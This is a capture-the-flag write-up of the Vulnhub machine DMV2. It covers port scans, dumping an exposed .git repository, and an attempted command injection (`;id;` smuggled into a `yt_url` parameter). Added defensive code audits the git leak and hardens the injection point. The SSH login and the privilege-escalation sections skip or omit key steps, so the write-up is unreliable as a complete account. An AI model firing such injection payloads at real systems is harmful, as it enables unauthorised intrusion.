DMV2 - Vulnhub - Level: Medium - Report

Tools used

nmap
nikto
gobuster
wfuzz
dirb
git-dumper
Burpsuite

Reconnaissance

We begin with reconnaissance to gather information about the target system. This includes scanning the network and listing hosts in order to identify potential points of attack.

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.107 08:00:27:f3:ea:30 PCS Systemtechnik GmbH

ARP-Scan shows us the MAC address and the vendor of the target's network card. This can help to determine the operating system or the virtualisation technology in use.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.107 dmv2.vln

The entry in /etc/hosts lets us address the target system via the hostname `dmv2.vln`. This makes further analysis and testing easier.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-27 20:51 CET
Nmap scan report for dmv2.vln (192.168.2.107)
Host is up (0.00093s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| 256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_ 256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-git:
| 192.168.2.107:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: DMV 2.0
| Remotes:
|_ ssh://developerdmv@127.0.0.1/home/developerdmv/site.git/
4545/tcp open worldscores?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, NULL, RPCCheck:
| Welcome to DMV Admin
| Select product to update:
| Main site
| Admin
| other) Exit
| GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| Welcome to DMV Admin
| Select product to update:
| Main site
| Admin
| other) Exit
|_ Invalid choice
MAC Address: 08:00:27:F3:EA:30 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap identifies the open ports and services on the target system. Of particular interest are:
- SSH (port 22): allows secure remote login.
- HTTP (port 80): a web server that may host vulnerable applications. Interestingly, nmap's http-git script finds a Git repository served under /.git/, and its remote URL already reveals the username developerdmv.
- Port 4545: a custom service with an admin menu ("Welcome to DMV Admin").
The Apache version (2.4.29) points to outdated software that could contain known vulnerabilities.

Web Enumeration

Having identified the open ports, we now focus on the web server and the Git repository it exposes.

- Nikto v2.5.0
+ Target IP: 192.168.2.107
+ Target Hostname: 192.168.2.107
+ Target Port: 80
+ Start Time: 2024-10-27 20:53:06 (GMT1)

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-10-27 20:54:18 (GMT1) (72 seconds)

+ 1 host(s) tested

Nikto finds several potential security issues, including:
- Missing X-Frame-Options and X-Content-Type-Options headers: these increase the risk of clickjacking and MIME-sniffing attacks.
- A publicly accessible Git repository (`/.git`), which could expose sensitive information such as source code, configuration and commit history.
- An outdated Apache version, which may contain known vulnerabilities.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.107/index.php (Status: 200) [Size: 842]
http://192.168.2.107/images (Status: 301) [Size: 315] [--> http://192.168.2.107/images/]
http://192.168.2.107/js (Status: 301) [Size: 311] [--> http://192.168.2.107/js/]
http://192.168.2.107/tmp (Status: 301) [Size: 312] [--> http://192.168.2.107/tmp/]
Progress: 13674720 / 13674782 (100.00%)

Gobuster finds the following entries:
- `/index.php`: the main page of the web application.
- `/images`: directory for images.
- `/js`: directory for JavaScript files.
- `/tmp`: a temporary directory.

Initial Access

After the enumeration we concentrate on exploiting the discovered Git repository and on examining the service on port 4545.

webenum http://192.168.2.107:4545/
Welcome to DMV Admin
Select product to update:
1) Main site
2) DMV Admin
other) Exit
Invalid choice
┌──(root㉿CCat)-[~]
└─# nc -vn 192.168.2.107 4545
(UNKNOWN) [192.168.2.107] 4545 (?) open
Welcome to DMV Admin
Select product to update:
1) Main site
2) DMV Admin
other) Exit
1
Output:
fatal: detected dubious ownership in repository at '/var/www/html'
To add an exception for this directory, call:

git config --global --add safe.directory /var/www/html
Failed: exit status 128
Welcome to DMV Admin
Select product to update:
1) Main site
2) DMV Admin
other) Exit

We connect to the service on port 4545 and choose option 1 ("Main site"). The output shows that the service tries to run a Git operation on /var/www/html, but fails with "detected dubious ownership": Git refuses to work in a repository owned by a different user than the one running the command, so the update is never applied.

┌──(pwn)─(root㉿CCat)-[~]
└─# git-dumper http://192.168.2.107/ .
Traceback (most recent call last):
File "/usr/local/bin/git-dumper", line 5, in
from git_dumper import main
ModuleNotFoundError: No module named 'git_dumper'

We try to download the Git repository with `git-dumper`, but the command fails because the Python module `git_dumper` cannot be found.

┌──(pwn)─(root㉿CCat)-[~]
└─# git-dumper http://192.168.2.107/ .

┌──(pwn)─(root㉿CCat)-[~]
└─# dirb http://dmv2/.git/
START_TIME: Sun Oct 27 21:54:16 2024
URL_BASE: http://dmv2/.git/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

- Scanning URL: http://dmv2/.git/ -
+ http://dmv2/.git/config (CODE:200|SIZE:281)
> DIRECTORY: http://dmv2/.git/hooks/
+ http://dmv2/.git/index (CODE:200|SIZE:932)
> DIRECTORY: http://dmv2/.git/info/
> DIRECTORY: http://dmv2/.git/logs/
> DIRECTORY: http://dmv2/.git/objects/

- Entering directory: http://dmv2/.git/hooks/

- Entering directory: http://dmv2/.git/info/
+ http://dmv2/.git/info/exclude (CODE:200|SIZE:240)

- Entering directory: http://dmv2/.git/logs/

- Entering directory: http://dmv2/.git/objects/
> DIRECTORY: http://dmv2/.git/objects/07/
> DIRECTORY: http://dmv2/.git/objects/08/
> DIRECTORY: http://dmv2/.git/objects/13/
> DIRECTORY: http://dmv2/.git/objects/dc/
> DIRECTORY: http://dmv2/.git/objects/info/
> DIRECTORY: http://dmv2/.git/objects/pack/

- Entering directory: http://dmv2/.git/objects/07/

- Entering directory: http://dmv2/.git/objects/08/

- Entering directory: http://dmv2/.git/objects/13/

- Entering directory: http://dmv2/.git/objects/dc/

- Entering directory: http://dmv2/.git/objects/info/

- Entering directory: http://dmv2/.git/objects/pack/

--
END_TIME: Sun Oct 27 21:54:27 2024
DOWNLOADED: 50732 - FOUND: 3

We use dirb to explore the structure of the exposed Git repository and find the files `config`, `index` and `info/exclude`.

python3 git_dumper.py http://192.168.2.107/ .
Warning: Destination '.' is not empty
[-] Testing http://192.168.2.107/.git/HEAD [200]
[-] Testing http://192.168.2.107/.git/ [403]
[-] Fetching common files
[-] Already downloaded http://192.168.2.107/.gitignore
[-] Already downloaded http://192.168.2.107/.git/description
[-] Already downloaded http://192.168.2.107/.git/hooks/applypatch-msg.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/commit-msg.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/post-update.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-applypatch.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-commit.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-push.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-rebase.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/pre-receive.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/prepare-commit-msg.sample
[-] Already downloaded http://192.168.2.107/.git/hooks/update.sample
[-] Already downloaded http://192.168.2.107/.git/index
[-] Already downloaded http://192.168.2.107/.git/info/exclude
[-] Fetching http://192.168.2.107/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.2.107/.git/hooks/post-receive.sample [404]
[-] http://192.168.2.107/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://192.168.2.107/.git/hooks/post-commit.sample [404]
[-] http://192.168.2.107/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/info/packs [404]
[-] http://192.168.2.107/.git/objects/info/packs responded with status code 404
[-] Finding refs/
[-] Fetching http://192.168.2.107/.git/FETCH_HEAD [200]
[-] Fetching http://192.168.2.107/.git/HEAD [200]
[-] Fetching http://192.168.2.107/.git/ORIG_HEAD [200]
[-] Fetching http://192.168.2.107/.git/config [200]
[-] Fetching http://192.168.2.107/.git/info/refs [404]
[-] http://192.168.2.107/.git/info/refs responded with status code 404
[-] Fetching http://192.168.2.107/.git/logs/refs/stash [404]
[-] http://192.168.2.107/.git/logs/refs/stash responded with status code 404
[-] Fetching http://192.168.2.107/.git/logs/refs/heads/master [200]
[-] Fetching http://192.168.2.107/.git/refs/remotes/origin/HEAD [200]
[-] Fetching http://192.168.2.107/.git/logs/HEAD [200]
[-] Fetching http://192.168.2.107/.git/refs/stash [404]
[-] http://192.168.2.107/.git/refs/stash responded with status code 404
[-] Fetching http://192.168.2.107/.git/refs/wip/wtree/refs/heads/master [404]
[-] http://192.168.2.107/.git/refs/wip/wtree/refs/heads/master responded with status code 404
[-] Fetching http://192.168.2.107/.git/refs/heads/master [200]
[-] Fetching http://192.168.2.107/.git/refs/wip/index/refs/heads/master [404]
[-] http://192.168.2.107/.git/refs/wip/index/refs/heads/master responded with status code 404
[-] Fetching http://192.168.2.107/.git/packed-refs [200]
[-] Fetching http://192.168.2.107/.git/logs/refs/remotes/origin/HEAD [200]
[-] Fetching http://192.168.2.107/.git/refs/remotes/origin/master [200]
[-] Fetching http://192.168.2.107/.git/logs/refs/remotes/origin/master [200]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://192.168.2.107/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] http://192.168.2.107/.git/objects/00/00000000000000000000000000000000000000 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/13/6beafb81ce4aa2b0b9225df70a4cd06f7e7940 [200]
[-] Fetching http://192.168.2.107/.git/objects/99/8441a9bf12a5c61126a38b9aa92f7bdb3fed41 [404]
[-] http://192.168.2.107/.git/objects/99/8441a9bf12a5c61126a38b9aa92f7bdb3fed41 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/2a/89468d12d2133daa2354a9dd28cf52ae0548cd [200]
[-] Fetching http://192.168.2.107/.git/objects/d3/4bb4259d9acb437d9f089aaa6f25343bb2611c [200]
[-] Fetching http://192.168.2.107/.git/objects/70/e8c816ecadfd724094e248a12674a5ec1b805f [200]
[-] Fetching http://192.168.2.107/.git/objects/6d/0cb621659c749cda20816ea5a51267db37dc59 [200]
[-] Fetching http://192.168.2.107/.git/objects/57/196b7d516fd106cfae611d3c0b537d3686cfc3 [200]
[-] Fetching http://192.168.2.107/.git/objects/07/e34efdd85cfc0cd908c2213c5d7335060f3ae2 [200]
[-] Fetching http://192.168.2.107/.git/objects/78/69f512341325c086669d1047996bf3cbb56715 [404]
[-] http://192.168.2.107/.git/objects/78/69f512341325c086669d1047996bf3cbb56715 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/2f/28555d7c7c6d511c3f8caeaf6d5884945af39b [404]
[-] http://192.168.2.107/.git/objects/2f/28555d7c7c6d511c3f8caeaf6d5884945af39b responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/c7/8b76780fe411eb7786a15b99fc02c05cc1c1f5 [200]
[-] Fetching http://192.168.2.107/.git/objects/0f/efc345993731f81899b71d702009b50ac6232d [200]
[-] Fetching http://192.168.2.107/.git/objects/3f/ec32c842751033d92c8967eba40c3911333a78 [200]
[-] Fetching http://192.168.2.107/.git/objects/0e/186088ce28220ec366c5741bdd0097ff6740cf [404]
[-] http://192.168.2.107/.git/objects/0e/186088ce28220ec366c5741bdd0097ff6740cf responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/a5/5129286e6535d241fdcec8433f29915bcf2595 [200]
[-] Fetching http://192.168.2.107/.git/objects/69/64f6c4d5750690695312138bdfa70338195d5a [404]
[-] http://192.168.2.107/.git/objects/69/64f6c4d5750690695312138bdfa70338195d5a responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/5a/928f6da25ac6d6ba65480b76d03a71cb906138 [200]
[-] Fetching http://192.168.2.107/.git/objects/2a/e9352c194523e3fbdc50ade4bcd620162d9016 [404]
[-] http://192.168.2.107/.git/objects/2a/e9352c194523e3fbdc50ade4bcd620162d9016 responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/dc/29515021bb64943226019ef14cd0a9ce940907 [200]
[-] Fetching http://192.168.2.107/.git/objects/47/997f4fdca6e3ff27d6c142b073fca894c1b13f [404]
[-] http://192.168.2.107/.git/objects/47/997f4fdca6e3ff27d6c142b073fca894c1b13f responded with status code 404
[-] Fetching http://192.168.2.107/.git/objects/08/1b5357b1dffb3ff3f1a486907b6ff86207a6a8 [200]
[-] Running git checkout .

We have now downloaded the repository contents with git-dumper and will go through the repository next.

cat config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = ssh://developerdmv@127.0.0.1/home/developerdmv/site.git/
fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote = origin
merge = refs/heads/master

The command cat config shows that the remote user is developerdmv.

cat description
Unnamed repository; edit this file 'description' to name the repository.

cat packed-refs
# pack-refs with: peeled fully-peeled sorted
998441a9bf12a5c61126a38b9aa92f7bdb3fed41 refs/remotes/origin/master

cd logs
ll
insgesamt 8
-rwxr-x 1 root root 642 27. Oct 22:04 HEAD
drwxr-x 4 root root 4096 4. Jun 00:01 refs

cat HEAD
0000000000000000000000000000000000000000 998441a9bf12a5c61126a38b9aa92f7bdb3fed41 www-data 1588092277 +0000 clone: from ssh://developerdmv@127.0.0.1/home/developerdmv/site/
998441a9bf12a5c61126a38b9aa92f7bdb3fed41 d34bb4259d9acb437d9f089aaa6f25343bb2611c Developer DMV 1588092529 +0000 commit: htaccess
d34bb4259d9acb437d9f089aaa6f25343bb2611c 2a89468d12d2133daa2354a9dd28cf52ae0548cd Developer DMV 1588097785 +0000 commit: Fix
2a89468d12d2133daa2354a9dd28cf52ae0548cd 136beafb81ce4aa2b0b9225df70a4cd06f7e7940 Developer DMV 1588097855 +0000 commit: DMV 2.0

Burpsuite Request:
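The nikto finding above (`/.git` served by the web server) and the `config` and `logs/HEAD` dump just shown illustrate the same exposure: a `.git` directory that is reachable over HTTP leaks remote URLs, internal hosts, usernames and commit history without any authentication. The following script is an added example, not code from the walkthrough or from the DMV2 box; it parses the two files as recovered above (embedded here as constructed sample strings, with the record format taken from git's own reflog layout) and summarises what a defender should assume an attacker now knows. The function names (`parse_git_config`, `parse_reflog`, `audit_exposed_git`) and the `RefEntry` class are my own.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample input: .git/config as recovered from the dumped repository.
GIT_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
[remote "origin"]
\turl = ssh://developerdmv@127.0.0.1/home/developerdmv/site.git/
\tfetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
\tremote = origin
\tmerge = refs/heads/master
"""

# Constructed sample input: .git/logs/HEAD as recovered from the dump. A real
# reflog also carries "<email>" after the name; the parser accepts both forms.
REFLOG = """0000000000000000000000000000000000000000 998441a9bf12a5c61126a38b9aa92f7bdb3fed41 www-data 1588092277 +0000\tclone: from ssh://developerdmv@127.0.0.1/home/developerdmv/site/
998441a9bf12a5c61126a38b9aa92f7bdb3fed41 d34bb4259d9acb437d9f089aaa6f25343bb2611c Developer DMV 1588092529 +0000\tcommit: htaccess
d34bb4259d9acb437d9f089aaa6f25343bb2611c 2a89468d12d2133daa2354a9dd28cf52ae0548cd Developer DMV 1588097785 +0000\tcommit: Fix
2a89468d12d2133daa2354a9dd28cf52ae0548cd 136beafb81ce4aa2b0b9225df70a4cd06f7e7940 Developer DMV 1588097855 +0000\tcommit: DMV 2.0
"""

SECTION_RE = re.compile(r'^\[(\w+)(?:\s+"([^"]*)")?\]$')
# old-sha new-sha <identity> <unix-timestamp> <tz> <message>
REFLOG_RE = re.compile(
    r"^(?P<old>[0-9a-f]{40}) (?P<new>[0-9a-f]{40}) (?P<who>.+?) "
    r"(?P<ts>\d+) (?P<tz>[+-]\d{4})\s+(?P<msg>.*)$"
)
URL_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://\S+")


def parse_git_config(text: str) -> Dict[str, Dict[str, str]]:
    """Parse git's INI-like config into {"remote.origin": {"url": ...}, ...}."""
    config: Dict[str, Dict[str, str]] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = SECTION_RE.match(line)
        if m:  # "[core]" -> "core", '[remote "origin"]' -> "remote.origin"
            section = m.group(1) if m.group(2) is None else f"{m.group(1)}.{m.group(2)}"
            config.setdefault(section, {})
            continue
        if section is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        config[section][key.strip()] = value.strip()
    return config


@dataclass
class RefEntry:
    old: str
    new: str
    who: str
    timestamp: int
    tz: str
    message: str

    @property
    def when(self) -> datetime:
        return datetime.fromtimestamp(self.timestamp, tz=timezone.utc)


def parse_reflog(text: str) -> List[RefEntry]:
    """Parse .git/logs/* records; lines that are not reflog records are skipped."""
    entries = []
    for line in text.splitlines():
        m = REFLOG_RE.match(line)
        if m:
            entries.append(RefEntry(m["old"], m["new"], m["who"],
                                    int(m["ts"]), m["tz"], m["msg"]))
    return entries


def audit_exposed_git(config_text: str, reflog_text: str) -> Dict[str, object]:
    """Summarise what a publicly served .git directory gives away."""
    config = parse_git_config(config_text)
    entries = parse_reflog(reflog_text)
    # Remote URLs from config plus any URL mentioned in reflog messages (e.g. "clone: from ...").
    urls = [v for sec, kv in config.items() if sec.startswith("remote.")
            for k, v in kv.items() if k == "url"]
    for e in entries:
        urls.extend(URL_RE.findall(e.message))
    users, hosts, paths = set(), set(), set()
    for u in urls:
        parts = urlsplit(u)
        if parts.username:
            users.add(parts.username)
        if parts.hostname:
            hosts.add(parts.hostname)
        if parts.path:
            paths.add(parts.path)
    return {
        "remote_urls": urls,
        "ssh_users": users,            # account names an attacker can now try on SSH
        "hosts": hosts,                # internal hosts referenced by the repository
        "paths": paths,                # filesystem layout on the origin host
        "committers": list(dict.fromkeys(e.who for e in entries)),  # unique, in order
        "commits": [(e.new, e.message) for e in entries if e.message.startswith("commit:")],
    }


if __name__ == "__main__":
    for key, value in audit_exposed_git(GIT_CONFIG, REFLOG).items():
        print(f"{key}: {value}")
```

Run against the two files above it reports the SSH user `developerdmv`, the origin host `127.0.0.1`, the home-directory paths and the commit history; the same parser can be pointed at a dump of any web root to judge the impact of an exposed `.git` directory. The mitigation is to deny web access to `.git` (and not to deploy by cloning into the document root at all).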
POST / HTTP/1.1
Host: dmv2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 55
Origin: http://dmv2
DNT: 1
Connection: keep-alive
Referer: http://dmv2/index.php
Sec-GPC: 1
Priority: u=0

yt_url=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D;id;

We try once more to perform a command injection through the yt_url parameter, but the YouTube video validation thwarts us here: the parameter is validated as a file/URL and is not passed on as code.
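The request above appends `;id;` to a YouTube URL in the hope that the server splices the parameter into a shell command line. The walkthrough does not show how the DMV2 application validates `yt_url`, so the following is an added example of my own, not the box's code: it decodes the captured payload, shows the vulnerable pattern (the raw value interpolated into a command string, returned here rather than executed) beside a hardened version that only accepts a syntactically valid YouTube video id and passes a rebuilt canonical URL as a single argument with no shell. The names `extract_video_id`, `build_command_unsafe` and `build_command_safe` are assumptions, as is the constructed video id `aBcDeFgHiJ0`.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# The yt_url value from the captured request, URL-decoded:
#   https://www.youtube.com/watch?v=;id;
# The ';' is a shell command separator smuggled into what should be a video URL.
INJECTED_URL = unquote("https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3D;id;")

# YouTube video ids are exactly 11 characters from this alphabet.
VIDEO_ID = re.compile(r"[A-Za-z0-9_-]{11}")
YOUTUBE_HOSTS = {"www.youtube.com", "youtube.com", "m.youtube.com"}


def extract_video_id(yt_url: str) -> Optional[str]:
    """Return the video id if yt_url is a plain YouTube watch/youtu.be link, else None."""
    try:
        parts = urlsplit(yt_url)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):
        return None
    host = (parts.hostname or "").lower()
    if host in YOUTUBE_HOSTS:
        if parts.path != "/watch":
            return None
        vid = parse_qs(parts.query).get("v", [""])[0]
    elif host == "youtu.be":
        vid = parts.path.strip("/")
    else:
        return None
    # fullmatch rejects anything that is not exactly one well-formed id,
    # so ';id;' (or an empty value) never passes.
    return vid if VIDEO_ID.fullmatch(vid) else None


def is_accepted(yt_url: str) -> bool:
    return extract_video_id(yt_url) is not None


def build_command_unsafe(yt_url: str) -> str:
    """Vulnerable pattern: the raw parameter is spliced into a shell command line.
    Returned as a string only and never executed here; run through a shell, the
    ';' in INJECTED_URL would end the youtube-dl command and start a new one."""
    return f"youtube-dl {yt_url}"


def build_command_safe(yt_url: str) -> List[str]:
    """Hardened pattern: validate, rebuild a canonical URL from the id alone and
    hand it over as one argv element (to be run with subprocess.run(argv), no shell)."""
    vid = extract_video_id(yt_url)
    if vid is None:
        raise ValueError("yt_url is not a YouTube video URL")
    return ["youtube-dl", "--", f"https://www.youtube.com/watch?v={vid}"]


if __name__ == "__main__":
    print("decoded payload :", INJECTED_URL)
    print("unsafe command  :", build_command_unsafe(INJECTED_URL))
    print("accepted?       :", is_accepted(INJECTED_URL))
    print("safe argv       :", build_command_safe("https://youtu.be/aBcDeFgHiJ0"))
```

Two points matter for the hardened version: the value that reaches the command is rebuilt from the validated id, never the user's string, and it is passed as an argv list so no shell ever interprets it. Validation alone (an allow-list on the id) already stops this payload, which matches what the walkthrough observed; the argv list is the second layer for the case where validation is later relaxed.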

Privilege Escalation

Using the information found in the Git repository and the insights gained from analysing the service on port 4545, we now continue the pentest with the goal of obtaining the user developerdmv.

Using the information found in the Git repository, we try to connect to the SSH service as the discovered user.

┌──(root㉿CCat)-[~]
└─# ssh developerdmv@192.168.2.107
The authenticity of host '192.168.2.107 (192.168.2.107)' can't be established.
ED25519 key fingerprint is SHA256:WxGBWV4xNmpSzqR5NpxBG2DraRt3mjKFEVFQI4IIYn8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.107' (ED25519) to the list of known hosts.
developerdmv@192.168.2.107's password:

We log in via SSH as the user found through Git.

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-213-generic x86_64)
developerdmv@dmv2 id
uid=1000(developerdmv) gid=1000(developerdmv) groups=1000(developerdmv)

We verify that we are logged into the system as developerdmv.

developerdmv@dmv2 sudo -l
[sudo] password for developerdmv:
Sorry, user developerdmv may not run sudo on dmv2.

The user `developerdmv` may not run any commands with `sudo`.

find / -type f -perm -4000 -ls 2>/dev/null
690 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
8040 148 -rwsr-xr-x 1 root root 149080 Apr 4 2023 /usr/bin/sudo
9359 44 -rwsr-xr-x 1 root root 44528 Nov 29 2022 /usr/bin/chsh
7639 24 -rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
1124 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
9362 60 -rwsr-xr-x 1 root root 59640 Nov 29 2022 /usr/bin/passwd
9361 76 -rwsr-xr-x 1 root root 75824 Nov 29 2022 /usr/bin/gpasswd
9358 76 -rwsr-xr-x 1 root root 76496 Nov 29 2022 /usr/bin/chfn
10787 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newuidmap
10752 40 -rwsr-xr-x 1 root root 37136 Nov 29 2022 /usr/bin/newgidmap
8341 40 -rwsr-xr-x 1 root root 40344 Nov 29 2022 /usr/bin/newgrp
7670 16 -rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
7856 128 -rwsr-xr-x 1 root root 130264 May 29 2023 /usr/lib/snapd/snap-confine
8809 44 -rwsr-xr-- 1 root messagebus 42992 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1316 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
7620 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
13007 428 -rwsr-xr-x 1 root root 436552 Aug 11 2021 /usr/lib/openssh/ssh-keysign
66 40 -rwsr-xr-x 1 root root 40152 Jun 14 2022 /snap/core/17200/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/17200/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/17200/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Feb 7 2024 /snap/core/17200/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jun 14 2022 /snap/core/17200/bin/umount
2644 71 -rwsr-xr-x 1 root root 71824 Feb 7 2024 /snap/core/17200/usr/bin/chfn
2646 40 -rwsr-xr-x 1 root root 40432 Feb 7 2024 /snap/core/17200/usr/bin/chsh
2723 74 -rwsr-xr-x 1 root root 75304 Feb 7 2024 /snap/core/17200/usr/bin/gpasswd
2815 39 -rwsr-xr-x 1 root root 39904 Feb 7 2024 /snap/core/17200/usr/bin/newgrp
2828 53 -rwsr-xr-x 1 root root 54256 Feb 7 2024 /snap/core/17200/usr/bin/passwd
2938 134 -rwsr-xr-x 1 root root 136808 May 24 2023 /snap/core/17200/usr/bin/sudo
3037 42 -rwsr-xr-- 1 root systemd-resolve 42992 Sep 14 2023 /snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3409 419 -rwsr-xr-x 1 root root 428240 Jan 9 2024 /snap/core/17200/usr/lib/openssh/ssh-keysign
6483 125 -rwsr-xr-x 1 root root 127520 Jun 6 14:32 /snap/core/17200/usr/lib/snapd/snap-confine
7666 386 -rwsr-xr-- 1 root dip 394984 Jul 23 2020 /snap/core/17200/usr/sbin/pppd
525099 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
525065 44 -rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
525048 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
535906 44 -rwsr-xr-x 1 root root 44664 Nov 29 2022 /bin/su
525115 28 -rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount

We search for SUID binaries.

cd /var/www/html/.git
cat FETCH_HEAD
136beafb81ce4aa2b0b9225df70a4cd06f7e7940 branch 'master' of ssh://127.0.0.1/home/developerdmv/site

With cat FETCH_HEAD we retrieve information about the Git head.

Privilege Escalation

We have carried out the privilege escalation.

Flags